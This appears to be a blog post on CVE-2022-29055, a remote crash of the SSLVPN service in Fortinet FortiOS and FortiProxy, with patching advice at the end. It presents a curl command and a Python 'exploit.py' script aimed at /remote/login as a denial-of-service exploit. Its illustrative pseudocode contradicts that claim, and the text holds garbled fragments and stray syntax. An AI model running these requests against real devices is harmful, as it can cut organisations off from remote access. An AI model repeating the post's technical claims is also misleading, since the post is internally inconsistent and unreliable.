CVE-2022-29055 - Remote Crash in Fortinet FortiOS and FortiProxy via Uninitialized Pointer Vulnerability

In April 2022, a significant security vulnerability designated CVE-2022-29055 was discovered in several versions of Fortinet FortiOS and FortiProxy products. This vulnerability is serious as it allows anyone — whether or not they are logged in — to crash the SSLVPN service remotely through a specially crafted HTTP GET request. This blog post will break down what CVE-2022-29055 is, how it works under the hood, and why it’s so dangerous, using simple language and exclusive explanations.

What is the Vulnerability?

CVE-2022-29055 is a bug caused by accessing an uninitialized pointer in the SSLVPN daemon process. This happens when the program handles SSLVPN web requests without properly initializing or checking some objects in memory.

All 1.2.x releases

> Official Advisory:
> Fortinet PSIRT: Access of Uninitialized Pointer – SSLVPNd Crash

How Does It Happen?

The root of the problem lies in how the SSLVPN daemon (sslvpn) processes HTTP GET requests. If the request triggers a specific unnoticed code path, the program attempts to use a pointer that was never set to a proper value.

In plain English:
This is like trying to use a phone that you never charged up — it simply won’t work, and in this case, it causes the program to “crash,” which stops or restarts the SSLVPN service.

Let’s imagine this process in a stripped-down pseudocode

// Vulnerable handler function in sslvpn binary
void handle_get_request(const char* url, Connection* conn) {
    Session *user_session = NULL;

    // Some logic that is supposed to set user_session pointer, but it doesn't always happen
    if (strstr(url, "/remote/login")) {
        user_session = find_session(conn->cookie);
    }
    // But for other URLs, user_session could remain NULL

    // Unconditionally dereferencing the pointer
    if (user_session->permissions) { // <-- CRASHES here if user_session is NULL!
        // ...
    }
    // ...
}

So, by sending a carefully crafted HTTP GET request to the vulnerable endpoint (for example, /remote/login without proper authentication or cookies), an attacker can make the program try to use (or read) a pointer that doesn’t point to anything.

> Key Point:
> The attacker doesn’t need to log in. Just a GET request made over the network can cause the crash.

Here’s a simple way to exploit CVE-2022-29055 using curl (a command-line HTTP client)

curl -k "https://<target-FortiOS-or-FortiProxy-IP>/remote/login";

This alone, when pointed at a vulnerable device, is sometimes enough to take down the SSLVPN service!

In a more advanced script (for automation), it can look like this in Python

import requests
import sys

if len(sys.argv) != 2:
    print("Usage: python3 exploit.py https://<host>";)
    sys.exit(1)

target = sys.argv[1].rstrip('/')

try:
    # Unauthenticated GET request
    response = requests.get(target + '/remote/login', verify=False)
    print(f"Sent request, got status code {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

Users will not be able to initiate new VPN sessions until the service restarts.

Note:
This is NOT a remote code execution (RCE) bug. It causes a denial of service (DoS), disrupting access and potentially aiding other attacks like brute forcing credentials or hiding a larger attack.

Disruption of Business: Organizations relying on remote work are significantly disturbed.

- Potential Info Leak: Forced restarts may weaken other protections and indirectly help follow-up attacks.

Responsible Disclosure & Fix

Fortinet released patches and strongly recommended upgrading or mitigating.

References

- Official Fortinet Advisory – FG-IR-22-039
- VulnCheck Writeup on Exploitability
- NVD Details for CVE-2022-29055

How to Protect Yourself

1. Update Your FortiOS / FortiProxy:
Upgrade to a version listed as not vulnerable in the official Fortinet advisory.

2. Restrict Access:
Limit VPN web portal access to trusted IPs only, especially for the admin interface.

3. Monitor & Alert:
Watch for abnormal restarts or process crashes on the SSLVPNd service.

4. Temporary Mitigations:
If you can’t upgrade right away, consider disabling SSLVPN until you patch, or filtering unwanted HTTP requests at the network boundary.

Conclusion

CVE-2022-29055 shows that even a simple programming oversight — accessing a pointer that should have been checked or initialized — can have massive, real-world, business-wide impacts. If you manage Fortinet gear, patch now and secure your configs!

Further Reading

- Fortinet CVE-2022-29055 Advisory
- CVE Page at NIST


*This post is an original summary and educational analysis based on public advisories and technical field reports, intended to help IT professionals and security enthusiasts understand and address CVE-2022-29055.*

Timeline

Published on: 10/18/2022 15:15:00 UTC
Last modified on: 10/20/2022 19:13:00 UTC